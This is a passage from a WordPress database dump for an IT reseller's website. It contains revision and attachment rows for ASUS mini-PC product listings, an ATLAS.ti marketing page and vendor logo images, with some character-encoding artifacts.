36-month stable-supply guarantee.</li>\r\n 	<li>24/7 reliability â€” Extensively tested to ensure long-term reliability</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2572 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/MINI-PC-PN60.jpg\" alt=\"\" width=\"186\" height=\"186\" /></p>\r\n<p style=\"text-align: center;\"><strong>MINI PC PN60</strong></p>\r\n\r\n<ul>\r\n 	<li>Windows 10 Pro - ASUS recommends Windows 10 Pro.</li>\r\n 	<li>Ultracompact size with 0.62-liter volume for a clutter-free workspace</li>\r\n 	<li>Powerful performance with the latest IntelÂ® Coreâ„¢ processors</li>\r\n 	<li>Sliding chassis design for easy, two-step storage and memory upgrades</li>\r\n 	<li>Comprehensive I/O connectivity to meet different needs</li>\r\n 	<li>ASUS Corporate Stable Model program ensuring 36-month stable-supply guarantee</li>\r\n 	<li>24/7 reliability â€” Extensively tested to ensure long-term dependability</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2570 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Mini-PC-PB40.jpg\" alt=\"\" width=\"183\" height=\"183\" /></p>\r\n<p style=\"text-align: center;\"><strong>Mini PC PB40</strong></p>\r\n\r\n<ul>\r\n 	<li>Windows 10 Pro - ASUS recommends Windows 10 Pro. or other editions available</li>\r\n 	<li>Ultraslim chassis: Versatile desktop PC in a slimline, one-liter metal case</li>\r\n 	<li>Comprehensive connectivity: Flexible I/O for a wide range of uses</li>\r\n 	<li>Dual storage: Experience smooth daily computing with one up to 64GB eMMC onboard and one up to 1TB 2.5-inch HDD</li>\r\n 	<li>ASUS Control Center: Server-grade IT management software</li>\r\n 	<li>ASUS Corporate Stable Model program: 36-month stable-supply guarantee</li>\r\n 	<li>24/7 reliability: Extensively tested to ensure long-term reliability</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\"wp-image-2573 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VivoMini-UN65U.jpg\" alt=\"\" width=\"172\" height=\"172\" /></p>\r\n<p style=\"text-align: center;\"><strong>VivoMini UN65U</strong></p>\r\n\r\n<ul>\r\n 	<li>Full-fledged desktop performance with the latest IntelÂ® Coreâ„¢ i7, i5, or i3 Kaby Lake processors with 4K visuals</li>\r\n 	<li>Ultra-compact Good Design Award-winning design with a Zen-inspired spun-metal-effect finish and weighing less than 700g</li>\r\n 	<li>Dual-storage design for additional storage capacity and flexibility</li>\r\n 	<li>M.2 SSD for data transfer speeds of up to 10Gbps</li>\r\n 	<li>Quiet mini PC with energy-efficient performance â€” even under demanding loads</li>\r\n 	<li>Two easy-access front-mounted ports with fast USB charging</li>\r\n 	<li>Lightning-fast 802.11ac Wi-Fi, with 100GB of free ASUS WebStorage space</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2576 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VivoMini-VC65-C1.jpg\" alt=\"\" width=\"178\" height=\"178\" /></p>\r\n<p style=\"text-align: center;\"><strong>VivoMini VC65-C1</strong></p>\r\n\r\n<div class=\"product-intro\">\r\n<ul>\r\n 	<li>8th Gen IntelÂ® Coreâ„¢ i7, i5, i3, PentiumÂ®Gold and CeleronÂ® processors</li>\r\n 	<li>Worldâ€™s smallest PC with five storage bays â€” Fits one M.2 SATA/PCIe SSD and up to four 2.5-inch SSDs or HDDs</li>\r\n 	<li>IntelÂ® Core i+ support with Optaneâ„¢ memory acceleration for 2X data speeds</li>\r\n 	<li>Space-saving design with embedded power adapter and VESA-mount support for flexible vertical or horizontal placement options</li>\r\n 	<li>4K UHD video output and support for up to three displays via HDMI, DisplayPort and VGA</li>\r\n 	<li>Full connectivity options including three USB 3.1 Gen2 ports, two audio output jack, and one 4-in-1 card reader</li>\r\n 	<li>Quiet and energy-efficient performance, even at full load</li>\r\n 	<li>ASUS Corporate Stable Model program ensuring 36-month stable-supply guarantee</li>\r\n 	<li>24/7 reliability â€” Extensively tested to ensure long-term dependability</li>\r\n</ul>\r\n</div>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2575 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VivoMini-VC65-C.jpg\" alt=\"\" width=\"183\" height=\"184\" /></p>\r\n<p style=\"text-align: center;\"><strong>VivoMini VC65-C</strong></p>\r\n\r\n<ul>\r\n 	<li>Windows 10 Pro - ASUS recommends Windows 10 Pro. or other editions available</li>\r\n 	<li>8th Gen IntelÂ® Coreâ„¢ i7, i5, i3, PentiumÂ®Gold and CeleronÂ® processors</li>\r\n 	<li>Windows 10 Pro (other editions available)</li>\r\n 	<li>Worldâ€™s smallest PC with five storage bays â€” Fits one M.2 SATA/PCIe SSD and up to four 2.5-inch SSDs or HDDs</li>\r\n 	<li>Space-saving design with embedded power adapter and VESA-mount support for flexible vertical or horizontal placement options</li>\r\n 	<li>4K UHD video output via HDMI, DisplayPort and VGA</li>\r\n 	<li>Full connectivity options including three USB 3.1 Gen1 ports, two audio output jack, and one 4-in-1 card reader</li>\r\n 	<li>Quiet and energy-efficient performance, even at full load</li>\r\n 	<li>24/7 reliability â€” Extensively tested to ensure long-term dependability</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2574 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VivoMini-UN68U.jpg\" alt=\"\" width=\"184\" height=\"184\" /></p>\r\n<p style=\"text-align: center;\"><strong>VivoMini UN68U</strong></p>\r\n\r\n<ul>\r\n 	<li>Full-fledged desktop performance with the latest 8th Gen IntelÂ® Coreâ„¢ i7 or i5 Kaby Lake R processors &amp; DDR4 2400MHz support</li>\r\n 	<li>Dual-storage design for additional storage capacity and flexibility</li>\r\n 	<li>NVM ExpressÂ® support for blazingly fast SSD data transfers of up to 32Gbps</li>\r\n 	<li>Two easy-access front-mounted USB 3.1 Gen 2 ports with fast USB charging</li>\r\n 	<li>Quiet mini PC with energy-efficient performance â€” even under demanding loads</li>\r\n 	<li>ASUS Business Manager software for routine maintenance and servicing</li>\r\n 	<li>Lightning-fast 802.11ac Wi-Fi, with 100GB of free ASUS WebStorage space</li>\r\n 	<li>VESA-mount compatible for a tidy, clutter-free workstation</li>\r\n 	<li>Ultra-compact Good Design Award-winning design with a Zen-inspired spun-metal-effect finish and weighing less than 700g</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Asus','','inherit','closed','closed','','1442-revision-v1','','','2019-09-18 16:15:26','2019-09-18 08:15:26','',1442,'https://bintara.com.my/blog/2019/09/18/1442-revision-v1/',0,'revision','',0),(3203,1,'2019-09-18 16:20:02','2019-09-18 08:20:02','<h3>What is ATLAS.ti?</h3>\n<strong>ATLAS.ti is a powerful workbench for the qualitative analysis of large bodies of textual, graphical, audio and video data.</strong>\n\nSophisticated tools help you to arrange, reassemble, and manage your material in creative, yet systematic ways. ATLAS.ti keeps you focused on the material itself. Whether your field is anthropology, economics, criminology, or medicine: ATLAS.ti will meet your qualitative analysis needs!\n\n&nbsp;\n<h3 id=\"Huge-Variety-Of-Media-Types\">Huge Variety Of Media Types</h3>\nATLAS.ti offers anÂ <strong>unsurpassed range of media</strong>Â for you to work with: Whether itâ€™s coding hundreds of documents, audio clips or photos, ATLAS.ti will never let you down!\n\nWork withÂ <strong>text documents in all major formats</strong>â€“including txt,.doc, .docx, .odt, and, of course, .pdf. Perform fully automated searches across one or multiple documents, auto-coding, and other powerful semantic operations to extract meaning.\n\nEnjoy the freedom of working withÂ <strong>dozens of graphic and audio formats</strong>Â (.wav, ,mp3, .wma, etc.) as well as most common video types (.avi, .mp4, .wmv, etc.).\n\nYou canÂ <strong>import data from Evernote, Twitter,</strong>Â and your favorite Reference Manager for aÂ <strong>literature review</strong>Â . OrÂ <strong>import entire surveys</strong>Â to analyze answers to open-ended questions.\n\n&nbsp;\n<h3 id=\"Explore-Material-In-Great-Depth\">Explore Material In Great Depth</h3>\nGet to know your material in tremendous depth. Code systematically and develop aÂ <strong>system of meaning</strong>Â that unlocks your specific research subject.Â <strong>Explore</strong>Â your data with the Network Editor, the Text Search Tool, word clouds, word frequency tables, and through the various query options.\n\nThese tools will help you toÂ <strong>discover</strong>Â the intricate hidden â€œtextureâ€ of your data, its interwoven meanings.\n\n&nbsp;\n<h3 id=\"Powerful-Tool-set\">Powerful Tool set</h3>\nATLAS.ti offers a set of tools and features that are powerful and flexible enough to get to the bottom of even the most complex data material.\n\nYour central workspace in ATLAS.ti serves as a container for your projectâ€™s data. Access to all basic project components such as your documents, highlighted/coded data segments, codes, memos, hyperlinks, groups, or networks is fast and comfortable.\n\n<strong>Coding</strong>Â can be done by simply dragging codes onto the selected piece of data. Object Managers, the Project Explorer, and the Co-occurrence Explorer let you browse and navigate through your project data.\n\n<strong>Link</strong>Â your findings in aÂ <strong>semantically meaningful way</strong>.\n\n<strong>Visualize</strong>Â your findings and interpretations in a digital mind map as you go.\n\n&nbsp;\n<h3 id=\"Unique-Features\">Unique Features</h3>\nTheÂ <strong>interactive margin area</strong>Â is a unique work space in ATLAS.ti not surpassed by any other program on the market. It permits a uniquely intuitive way of interacting with your data, digitally transferring the traditional paper-and-pen analogy in the digital world.\n\nTheÂ <strong>quotation level</strong>Â is also radically unique to ATLAS.ti. If offers an analytic level below coding and better supports inductive, interpretive research approaches like grounded theory, hermeneutic, discourse analysis, sociology of knowledge, or phenomenology than any other software.\n\nThis can also be said about the ATLAS.tiÂ <strong>network / visualization</strong>Â function. It offers the most integrated way of working with your data, it is a tool for visualization as well as for analysis, for data organization as well as conceptual level analytic work and data presentation.\n\nBecause of the way ATLAS.ti manages data under the hood, it allows for handling muchÂ <strong>larger projects</strong>Â than other products: ATLAS.ti handle projects that contain thousands of documents and/or tens of thousands of coded data segments.\n\n&nbsp;\n<h3 id=\"Team-Work\">Team Work</h3>\nATLAS.ti supportsÂ <strong>collaborative work</strong>Â in several highly effective ways. Dedicated tools as well as some general principles of the software make collaborations a breeze.\n\n&nbsp;\n<h3 id=\"Long-Data-Lifespan\">Long Data Lifespan</h3>\nTo supportÂ <strong>multi-method multi-user projects across space and time (longitudinal studies)</strong>, project data export using XML is available. With XML, the proprietary nature of most software systems can be mitigated. This is indeed a mandatory need in scientific settings. ATLAS.tiâ€™s dedicated XML schema influenced the development of theÂ QuDEXÂ language for the purpose of archiving qualitative data.\n\n&nbsp;\n<h3 id=\"Great-User-Support\">Great User Support</h3>\nATLAS.ti comes withÂ <strong>unsurpassed service</strong>Â andÂ <strong>multiple sources of support</strong>. Get a first overview of the software during one of ourÂ free webinarÂ hold in different languages.\n\n\n<h4>Instructional material</h4>\nOurÂ Quick TourÂ and the many videos on ourÂ YouTube channelÂ will help you to quickly master the software.\n\n&nbsp;\n<h3>Support Center</h3>\nIf you have questions not covered, you can write to ourÂ Support CenterÂ twenty-four hours a day, or call ourÂ telephone supportÂ during office hours.\n\nOurÂ <strong>Support Center</strong>Â lets you conveniently contact our developers and our competent support staff via a state-of-the-art helpdesk system, guaranteeing swift turnaround and short response times.\n\n&nbsp;\n<h3>Shared Expertise</h3>\nFurther, peer-to-peer support is available through theÂ <strong>ATLAS.ti User Forum</strong>Â with thousands of members. TheÂ ATLAS.ti Research BlogÂ offers a range of articles written by ATLAS.ti users world-wide in a large variety of topics.\n\n&nbsp;\n\n[maxbutton id=\"1\" ]\n\n&nbsp;\n\n<iframe src=\"https://www.youtube.com/embed/guyThxVJj2w\" width=\"932\" height=\"524\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>','ATLAS.ti','','inherit','closed','closed','','1443-autosave-v1','','','2019-09-18 16:20:02','2019-09-18 08:20:02','',1443,'https://bintara.com.my/blog/2019/09/18/1443-autosave-v1/',0,'revision','',0),(3204,1,'2019-09-18 16:20:31','2019-09-18 08:20:31','<h3>What is ATLAS.ti?</h3>\r\n<strong>ATLAS.ti is a powerful workbench for the qualitative analysis of large bodies of textual, graphical, audio and video data.</strong>\r\n\r\nSophisticated tools help you to arrange, reassemble, and manage your material in creative, yet systematic ways. ATLAS.ti keeps you focused on the material itself. Whether your field is anthropology, economics, criminology, or medicine: ATLAS.ti will meet your qualitative analysis needs!\r\n\r\n&nbsp;\r\n<h3 id=\"Huge-Variety-Of-Media-Types\">Huge Variety Of Media Types</h3>\r\nATLAS.ti offers anÂ <strong>unsurpassed range of media</strong>Â for you to work with: Whether itâ€™s coding hundreds of documents, audio clips or photos, ATLAS.ti will never let you down!\r\n\r\nWork withÂ <strong>text documents in all major formats</strong>â€“including txt,.doc, .docx, .odt, and, of course, .pdf. Perform fully automated searches across one or multiple documents, auto-coding, and other powerful semantic operations to extract meaning.\r\n\r\nEnjoy the freedom of working withÂ <strong>dozens of graphic and audio formats</strong>Â (.wav, ,mp3, .wma, etc.) as well as most common video types (.avi, .mp4, .wmv, etc.).\r\n\r\nYou canÂ <strong>import data from Evernote, Twitter,</strong>Â and your favorite Reference Manager for aÂ <strong>literature review</strong>Â . OrÂ <strong>import entire surveys</strong>Â to analyze answers to open-ended questions.\r\n\r\n&nbsp;\r\n<h3 id=\"Explore-Material-In-Great-Depth\">Explore Material In Great Depth</h3>\r\nGet to know your material in tremendous depth. Code systematically and develop aÂ <strong>system of meaning</strong>Â that unlocks your specific research subject.Â <strong>Explore</strong>Â your data with the Network Editor, the Text Search Tool, word clouds, word frequency tables, and through the various query options.\r\n\r\nThese tools will help you toÂ <strong>discover</strong>Â the intricate hidden â€œtextureâ€ of your data, its interwoven meanings.\r\n\r\n&nbsp;\r\n<h3 id=\"Powerful-Tool-set\">Powerful Tool set</h3>\r\nATLAS.ti offers a set of tools and features that are powerful and flexible enough to get to the bottom of even the most complex data material.\r\n\r\nYour central workspace in ATLAS.ti serves as a container for your projectâ€™s data. Access to all basic project components such as your documents, highlighted/coded data segments, codes, memos, hyperlinks, groups, or networks is fast and comfortable.\r\n\r\n<strong>Coding</strong>Â can be done by simply dragging codes onto the selected piece of data. Object Managers, the Project Explorer, and the Co-occurrence Explorer let you browse and navigate through your project data.\r\n\r\n<strong>Link</strong>Â your findings in aÂ <strong>semantically meaningful way</strong>.\r\n\r\n<strong>Visualize</strong>Â your findings and interpretations in a digital mind map as you go.\r\n\r\n&nbsp;\r\n<h3 id=\"Unique-Features\">Unique Features</h3>\r\nTheÂ <strong>interactive margin area</strong>Â is a unique work space in ATLAS.ti not surpassed by any other program on the market. It permits a uniquely intuitive way of interacting with your data, digitally transferring the traditional paper-and-pen analogy in the digital world.\r\n\r\nTheÂ <strong>quotation level</strong>Â is also radically unique to ATLAS.ti. If offers an analytic level below coding and better supports inductive, interpretive research approaches like grounded theory, hermeneutic, discourse analysis, sociology of knowledge, or phenomenology than any other software.\r\n\r\nThis can also be said about the ATLAS.tiÂ <strong>network / visualization</strong>Â function. It offers the most integrated way of working with your data, it is a tool for visualization as well as for analysis, for data organization as well as conceptual level analytic work and data presentation.\r\n\r\nBecause of the way ATLAS.ti manages data under the hood, it allows for handling muchÂ <strong>larger projects</strong>Â than other products: ATLAS.ti handle projects that contain thousands of documents and/or tens of thousands of coded data segments.\r\n\r\n&nbsp;\r\n<h3 id=\"Team-Work\">Team Work</h3>\r\nATLAS.ti supportsÂ <strong>collaborative work</strong>Â in several highly effective ways. Dedicated tools as well as some general principles of the software make collaborations a breeze.\r\n\r\n&nbsp;\r\n<h3 id=\"Long-Data-Lifespan\">Long Data Lifespan</h3>\r\nTo supportÂ <strong>multi-method multi-user projects across space and time (longitudinal studies)</strong>, project data export using XML is available. With XML, the proprietary nature of most software systems can be mitigated. This is indeed a mandatory need in scientific settings. ATLAS.tiâ€™s dedicated XML schema influenced the development of theÂ QuDEXÂ language for the purpose of archiving qualitative data.\r\n\r\n&nbsp;\r\n<h3 id=\"Great-User-Support\">Great User Support</h3>\r\nATLAS.ti comes withÂ <strong>unsurpassed service</strong>Â andÂ <strong>multiple sources of support</strong>. Get a first overview of the software during one of ourÂ free webinarÂ hold in different languages.\r\n\r\n&nbsp;\r\n<h3>Instructional material</h3>\r\nOurÂ Quick TourÂ and the many videos on ourÂ YouTube channelÂ will help you to quickly master the software.\r\n\r\n&nbsp;\r\n<h3>Support Center</h3>\r\nIf you have questions not covered, you can write to ourÂ Support CenterÂ twenty-four hours a day, or call ourÂ telephone supportÂ during office hours.\r\n\r\nOurÂ <strong>Support Center</strong>Â lets you conveniently contact our developers and our competent support staff via a state-of-the-art helpdesk system, guaranteeing swift turnaround and short response times.\r\n\r\n&nbsp;\r\n<h3>Shared Expertise</h3>\r\nFurther, peer-to-peer support is available through theÂ <strong>ATLAS.ti User Forum</strong>Â with thousands of members. TheÂ ATLAS.ti Research BlogÂ offers a range of articles written by ATLAS.ti users world-wide in a large variety of topics.\r\n\r\n<center>[maxbutton id=\"1\" ]</center>\r\n\r\n&nbsp;\r\n\r\n<iframe src=\"https://www.youtube.com/embed/guyThxVJj2w\" width=\"932\" height=\"524\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>','ATLAS.ti','','inherit','closed','closed','','1443-revision-v1','','','2019-09-18 16:20:31','2019-09-18 08:20:31','',1443,'https://bintara.com.my/blog/2019/09/18/1443-revision-v1/',0,'revision','',0),(3205,1,'2019-09-18 16:21:07','2019-09-18 08:21:07','<h3>What is ATLAS.ti?</h3>\r\n<strong>ATLAS.ti is a powerful workbench for the qualitative analysis of large bodies of textual, graphical, audio and video data.</strong>\r\n\r\nSophisticated tools help you to arrange, reassemble, and manage your material in creative, yet systematic ways. ATLAS.ti keeps you focused on the material itself. Whether your field is anthropology, economics, criminology, or medicine: ATLAS.ti will meet your qualitative analysis needs!\r\n\r\n&nbsp;\r\n<h3 id=\"Huge-Variety-Of-Media-Types\">Huge Variety Of Media Types</h3>\r\nATLAS.ti offers anÂ <strong>unsurpassed range of media</strong>Â for you to work with: Whether itâ€™s coding hundreds of documents, audio clips or photos, ATLAS.ti will never let you down!\r\n\r\nWork withÂ <strong>text documents in all major formats</strong>â€“including txt,.doc, .docx, .odt, and, of course, .pdf. Perform fully automated searches across one or multiple documents, auto-coding, and other powerful semantic operations to extract meaning.\r\n\r\nEnjoy the freedom of working withÂ <strong>dozens of graphic and audio formats</strong>Â (.wav, ,mp3, .wma, etc.) as well as most common video types (.avi, .mp4, .wmv, etc.).\r\n\r\nYou canÂ <strong>import data from Evernote, Twitter,</strong>Â and your favorite Reference Manager for aÂ <strong>literature review</strong>Â . OrÂ <strong>import entire surveys</strong>Â to analyze answers to open-ended questions.\r\n\r\n&nbsp;\r\n<h3 id=\"Explore-Material-In-Great-Depth\">Explore Material In Great Depth</h3>\r\nGet to know your material in tremendous depth. Code systematically and develop aÂ <strong>system of meaning</strong>Â that unlocks your specific research subject.Â <strong>Explore</strong>Â your data with the Network Editor, the Text Search Tool, word clouds, word frequency tables, and through the various query options.\r\n\r\nThese tools will help you toÂ <strong>discover</strong>Â the intricate hidden â€œtextureâ€ of your data, its interwoven meanings.\r\n\r\n&nbsp;\r\n<h3 id=\"Powerful-Tool-set\">Powerful Tool set</h3>\r\nATLAS.ti offers a set of tools and features that are powerful and flexible enough to get to the bottom of even the most complex data material.\r\n\r\nYour central workspace in ATLAS.ti serves as a container for your projectâ€™s data. Access to all basic project components such as your documents, highlighted/coded data segments, codes, memos, hyperlinks, groups, or networks is fast and comfortable.\r\n\r\n<strong>Coding</strong>Â can be done by simply dragging codes onto the selected piece of data. Object Managers, the Project Explorer, and the Co-occurrence Explorer let you browse and navigate through your project data.\r\n\r\n<strong>Link</strong>Â your findings in aÂ <strong>semantically meaningful way</strong>.\r\n\r\n<strong>Visualize</strong>Â your findings and interpretations in a digital mind map as you go.\r\n\r\n&nbsp;\r\n<h3 id=\"Unique-Features\">Unique Features</h3>\r\nTheÂ <strong>interactive margin area</strong>Â is a unique work space in ATLAS.ti not surpassed by any other program on the market. It permits a uniquely intuitive way of interacting with your data, digitally transferring the traditional paper-and-pen analogy in the digital world.\r\n\r\nTheÂ <strong>quotation level</strong>Â is also radically unique to ATLAS.ti. If offers an analytic level below coding and better supports inductive, interpretive research approaches like grounded theory, hermeneutic, discourse analysis, sociology of knowledge, or phenomenology than any other software.\r\n\r\nThis can also be said about the ATLAS.tiÂ <strong>network / visualization</strong>Â function. It offers the most integrated way of working with your data, it is a tool for visualization as well as for analysis, for data organization as well as conceptual level analytic work and data presentation.\r\n\r\nBecause of the way ATLAS.ti manages data under the hood, it allows for handling muchÂ <strong>larger projects</strong>Â than other products: ATLAS.ti handle projects that contain thousands of documents and/or tens of thousands of coded data segments.\r\n\r\n&nbsp;\r\n<h3 id=\"Team-Work\">Team Work</h3>\r\nATLAS.ti supportsÂ <strong>collaborative work</strong>Â in several highly effective ways. Dedicated tools as well as some general principles of the software make collaborations a breeze.\r\n\r\n&nbsp;\r\n<h3 id=\"Long-Data-Lifespan\">Long Data Lifespan</h3>\r\nTo supportÂ <strong>multi-method multi-user projects across space and time (longitudinal studies)</strong>, project data export using XML is available. With XML, the proprietary nature of most software systems can be mitigated. This is indeed a mandatory need in scientific settings. ATLAS.tiâ€™s dedicated XML schema influenced the development of theÂ QuDEXÂ language for the purpose of archiving qualitative data.\r\n\r\n&nbsp;\r\n<h3 id=\"Great-User-Support\">Great User Support</h3>\r\nATLAS.ti comes withÂ <strong>unsurpassed service</strong>Â andÂ <strong>multiple sources of support</strong>. Get a first overview of the software during one of ourÂ free webinarÂ hold in different languages.\r\n\r\n&nbsp;\r\n<h3>Instructional material</h3>\r\nOurÂ Quick TourÂ and the many videos on ourÂ YouTube channelÂ will help you to quickly master the software.\r\n\r\n&nbsp;\r\n<h3>Support Center</h3>\r\nIf you have questions not covered, you can write to ourÂ Support CenterÂ twenty-four hours a day, or call ourÂ telephone supportÂ during office hours.\r\n\r\nOurÂ <strong>Support Center</strong>Â lets you conveniently contact our developers and our competent support staff via a state-of-the-art helpdesk system, guaranteeing swift turnaround and short response times.\r\n\r\n&nbsp;\r\n<h3>Shared Expertise</h3>\r\nFurther, peer-to-peer support is available through theÂ <strong>ATLAS.ti User Forum</strong>Â with thousands of members. TheÂ ATLAS.ti Research BlogÂ offers a range of articles written by ATLAS.ti users world-wide in a large variety of topics.\r\n\r\n&nbsp;\r\n<center>[maxbutton id=\"1\" ]</center>\r\n\r\n&nbsp;\r\n\r\n<iframe src=\"https://www.youtube.com/embed/guyThxVJj2w\" width=\"932\" height=\"524\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>','ATLAS.ti','','inherit','closed','closed','','1443-revision-v1','','','2019-09-18 16:21:07','2019-09-18 08:21:07','',1443,'https://bintara.com.my/blog/2019/09/18/1443-revision-v1/',0,'revision','',0),(3220,1,'2019-09-23 14:47:47','2019-09-23 06:47:47','Honeywell','Honeywell','Honeywell','inherit','closed','closed','','artboard-211x','','','2019-09-23 14:48:05','2019-09-23 06:48:05','',2073,'https://bintara.com.my/wp-content/uploads/2018/12/Artboard-211x.png',0,'attachment','image/png',0),(3221,1,'2019-09-23 14:51:52','2019-09-23 06:51:52','Veeam','Veeam','Veeam','inherit','closed','closed','','artboard-11x','','','2019-09-23 14:52:07','2019-09-23 06:52:07','',1492,'https://bintara.com.my/wp-content/uploads/2018/12/Artboard-11x.png',0,'attachment','image/png',0),(3237,1,'2019-09-23 15:35:32','2019-09-23 07:35:32','Lg','Lg','Lg','inherit','closed','closed','','artboard-31x','','','2019-09-23 15:35:52','2019-09-23 07:35:52','',1399,'https://bintara.com.my/wp-content/uploads/2018/12/Artboard-31x.png',0,'attachment','image/png',0),(3223,1,'2019-09-23 14:56:22','2019-09-23 06:56:22','Ruckus','Ruckus','Ruckus','inherit','closed','closed','','artboard-41x','','','2019-09-23 14:56:42','2019-09-23 06:56:42','',1429,'https://bintara.com.my/wp-content/uploads/2018/12/Artboard-41x.png',0,'attachment','image/png',0),(3224,1,'2019-09-23 14:58:01','2019-09-23 06:58:01','Redhat','Redhat','Redhat','inherit','closed','closed','','artboard-61x','','','2019-09-23 14:58:24','2019-09-23 06:58:24','',1428,'https://bintara.com.my/wp-content/uploads/2018/12/Artboard-61x.png',0,'attachment','image/png',0),(3225,1,'2019-09-23 14:59:34','2019-09-23 06:59:34','Qnap','Qnap','Qnap','inherit','closed','closed','','artboard-111x','','','2019-09-23 15:02:28','2019-09-23 07:02:28','',1427,'https://bintara.com.my/wp-content/uploads/2018/12/Artboard-111x.png',0,'attachment','image/png',0),(3229,1,'2019-09-23 15:13:57','2019-09-23 07:13:57','Coreldraw','Coreldraw','Coreldraw','inherit','closed','closed','','artboard-141x','','','2019-09-23 15:14:19','2019-09-23 07:14:19','',1366,'https://bintara.com.my/wp-content/uploads/2018/12/Artboard-141x.png',0,'attachment','image/png',0),(3230,1,'2019-09-23 15:16:26','2019-09-23 07:16:26','Mcafee','Mcafee','Mcafee','inherit','closed','closed','','artboard-101x','','','2019-09-23 15:16:43','2019-09-23 07:16:43','',1403,'https://bintara.com.my/wp-content/uploads/2018/12/Artboard-101x.png',0,'attachment','image/png',0),(3231,1,'2019-09-23 15:18:18','2019-09-23 07:18:18','Lenovo','Lenovo','Lenovo','inherit','closed','closed','','artboard-91x','','','2019-09-23 15:18:36','2019-09-23 07:18:36','',1398,'https://bintara.com.my/wp-content/uploads/2018/12/Artboard-91x.png',0,'attachment','image/png',0),(3232,1,'2019-09-23 15:20:51','2019-09-23 07:20:51','GotoMeeting','GotoMeeting','GotoMeeting','inherit','closed','closed','','artboard-161x','','','2019-09-23 15:21:13','2019-09-23 07:21:13','',1636,'https://bintara.com.my/wp-content/uploads/2018/12/Artboard-161x.png',0,'attachment','image/png',0),(3233,1,'2019-09-23 15:21:35','2019-09-23 07:21:35','GotoTraining','GotoTraining','GotoTraining','inherit','closed','closed','','artboard-181x','','','2019-09-23 15:21:57','2019-09-23 07:21:57','',1636,'https://bintara.com.my/wp-content/uploads/2018/12/Artboard-181x.png',0,'attachment','image/png',0),(3234,1,'2019-09-23 15:23:39','2019-09-23 07:23:39','GotoWebinar','GotoWebinar','GotoWebinar','inherit','closed','closed','','artboard-191x','','','2019-09-23 15:23:57','2019-09-23 07:23:57','',1635,'https://bintara.com.my/wp-content/uploads/2018/12/Artboard-191x.png',0,'attachment','image/png',0),(3235,1,'2019-09-23 15:29:14','2019-09-23 07:29:14','Solarwinds','Solarwinds','Solarwinds','inherit','closed','closed','','artboard-11x-2','','','2019-09-23 15:34:09','2019-09-23 07:34:09','',1441,'https://bintara.com.my/wp-content/uploads/2018/12/Artboard-11x-1.png',0,'attachment','image/png',0),(3236,1,'2019-09-23 15:31:42','2019-09-23 07:31:42','Docusign','Docusign','Docusign','inherit','closed','closed','','artboard-21x','','','2019-09-23 15:33:19','2019-09-23 07:33:19','',1374,'https://bintara.com.my/wp-content/uploads/2018/12/Artboard-21x.png',0,'attachment','image/png',0),(3238,1,'2019-09-23 15:44:16','2019-09-23 07:44:16','Kofax','Kofax','Kofax','inherit','closed','closed','','artboard-171x','','','2019-09-23 15:44:32','2019-09-23 07:44:32','',1410,'https://bintara.com.my/wp-content/uploads/2018/12/Artboard-171x.png',0,'attachment','image/png',0),(3239,1,'2019-09-23 15:49:01','2019-09-23 07:49:01','Kaspersky','Kaspersky','Kaspersky','inherit','closed','closed','','artboard-71x','','','2019-09-23 15:49:25','2019-09-23 07:49:25','',1395,'https://bintara.com.my/wp-content/uploads/2018/12/Artboard-71x.png',0,'attachment','image/png',0),(3240,1,'2019-09-23 15:51:57','2019-09-23 07:51:57','Ergotron','Ergotron','Ergotron','inherit','closed','closed','','artboard-121x','','','2019-09-23 15:58:50','2019-09-23 07:58:50','',1378,'https://bintara.com.my/wp-content/uploads/2018/12/Artboard-121x.png',0,'attachment','image/png',0),(3241,1,'2019-09-23 16:20:01','2019-09-23 08:20:01','<a href=\"https://bintara.com.my/honeywell/\">Read More...</a>\n\n<!--more-->\n\n<img class=\"alignnone size-full wp-image-1678\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/GoToMeeting.jpg\" alt=\"\" width=\"1024\" height=\"681\" />\n\nhttps://bintara.com.my/wp-content/uploads/2018/12/Artboard-211x.png','HONEYWELL','','inherit','closed','closed','','2073-autosave-v1','','','2019-09-23 16:20:01','2019-09-23 08:20:01','',2073,'https://bintara.com.my/blog/2019/09/23/2073-autosave-v1/',0,'revision','',0),(3242,1,'2019-09-23 16:20:24','2019-09-23 08:20:24','Barcode Scanners, Data Capture, Mobile Printers, Card Printers, Rugged headsets and Mobile Computers. <a href=\"http://bintara.com.my/zebra\">Read More...</a>\n\n<!--more-->\n\n<img class=\"alignnone size-full wp-image-1715\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Zebra-Logo.jpg\" alt=\"\" width=\"1024\" height=\"681\" />','ZEBRA','','inherit','closed','closed','','1505-autosave-v1','','','2019-09-23 16:20:24','2019-09-23 